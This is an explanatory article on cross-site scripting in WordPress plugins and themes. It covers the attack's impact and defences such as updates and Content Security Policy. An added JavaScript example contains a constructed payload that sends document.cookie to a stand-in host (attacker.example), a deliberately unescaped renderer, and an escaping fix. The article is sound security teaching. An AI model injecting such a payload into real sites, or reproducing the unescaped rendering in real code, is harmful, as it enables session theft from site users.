The most common class of vulnerability reported in WordPress (mostly in plugins and themes) is cross-site scripting (XSS). This article explains what it is, what an attacker can do with it, and how to reduce the risk.


What is a cross-site scripting vulnerability?

Simply put, cross-site scripting is a vulnerability that lets an attacker run arbitrary JavaScript in another user's browser, in the context of the vulnerable site.

JavaScript is code that runs in the user's browser, not on the server. It controls the page's behaviour, fetches data in the background, and so on. The browser restricts it heavily: a script cannot write files or reach into the user's computer directly.

That does not mean the server is out of reach, however. Script running in a victim's browser acts with that victim's session on your site. If the victim is a logged-in administrator, the script can make authenticated requests to the WordPress admin (creating users, changing settings, installing plugins) and so alter data on the server indirectly, even though it never touches the server itself.

What can a cross-site scripting vulnerability do?

If a user follows a link containing malicious JavaScript (reflected XSS), or visits a page where an attacker has managed to store it (stored XSS), that script runs on your site in the user's browser.
In that case the user may suffer the following damage:

The user is redirected to malicious advertising or fraudulent (phishing) sites.

The user's session information for your site (stored in the browser's cookies, or readable from the page) is sent to the attacker.
(For this reason, XSS matters most on sites where users log in.)

The WordPress administrator's session is abused.
(WordPress sets its authentication cookies with the HttpOnly flag, so a script cannot read them directly, but a script running in the administrator's browser can still perform administrative actions with that session. Please refer to this article.)

XSS is used as a springboard for spam mail and DDoS attacks.
(XSS itself has no e-mail sending function, but an injected script can submit a WordPress site's contact form on the visitor's behalf; likewise, a script that makes many requests to a third-party site turns every visitor into a DDoS source.)
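The following is an added example, not code from the original article or from WordPress itself. It shows the two halves of the problem described above: a page that concatenates a query parameter straight into HTML (the kind of bug found in plugins and themes), the crafted input an attacker would put in a link, and the same page with output escaping applied. The function names, the constructed payload and the attacker.example host are this example's own inventions.

```javascript
// Added example (not from the original post or from WordPress):
// a minimal "search results" fragment rendered two ways, to show how
// reflected XSS arises and how escaping at output time prevents it.

// Constructed attacker input: what a victim's browser receives if it follows
// a crafted link such as /?s=<script>...</script>. The script tries to send
// the page's cookies to a host the attacker controls (attacker.example is made up).
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + encodeURIComponent(document.cookie))</script>';

// Vulnerable: the untrusted query is dropped into the HTML unchanged, so the
// browser parses the attacker's <script> tag as part of the page.
function renderUnsafe(query) {
  return '<h2>Search results for: ' + query + '</h2>';
}

// Escape the characters that change meaning in an HTML text context.
// This is the same transformation WordPress's esc_html() performs in PHP.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Hardened: escape at the point of output. The payload is still shown to the
// user, but only as literal text; no script element is created.
function renderSafe(query) {
  return '<h2>Search results for: ' + escapeHtml(query) + '</h2>';
}

// Crude check used by this example to compare the two outputs:
// does the produced HTML contain a script start tag the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Runs both renderers over the constructed payload and reports the difference.
function demo() {
  const unsafe = renderUnsafe(PAYLOAD);
  const safe = renderSafe(PAYLOAD);
  return {
    unsafeExecutes: containsScriptTag(unsafe), // true: the attacker's script runs
    safeExecutes: containsScriptTag(safe),     // false: shown as harmless text
    safeHtml: safe,
  };
}
```

Note that the check in containsScriptTag is only a demonstration aid; real XSS payloads do not need a script tag (an onerror attribute on an img element is enough), which is exactly why the fix is to escape every untrusted value at output rather than to look for known-bad strings.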

How to prevent cross-site scripting vulnerabilities?

The following measures are effective in preventing cross-site scripting vulnerabilities from being exploited.

Keep WordPress itself, plugins and themes up to date, so that known XSS bugs are patched and the vulnerable code is removed.

Set a Content Security Policy (CSP), a browser-enforced policy that restricts which scripts are allowed to run on your pages, so that an injected script is blocked even if a bug lets it into the HTML.
Reference: What is Content Security Policy CSP? How to set it up in WordPress

For WordPress malware and vulnerability scanning, see the following:
Free WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]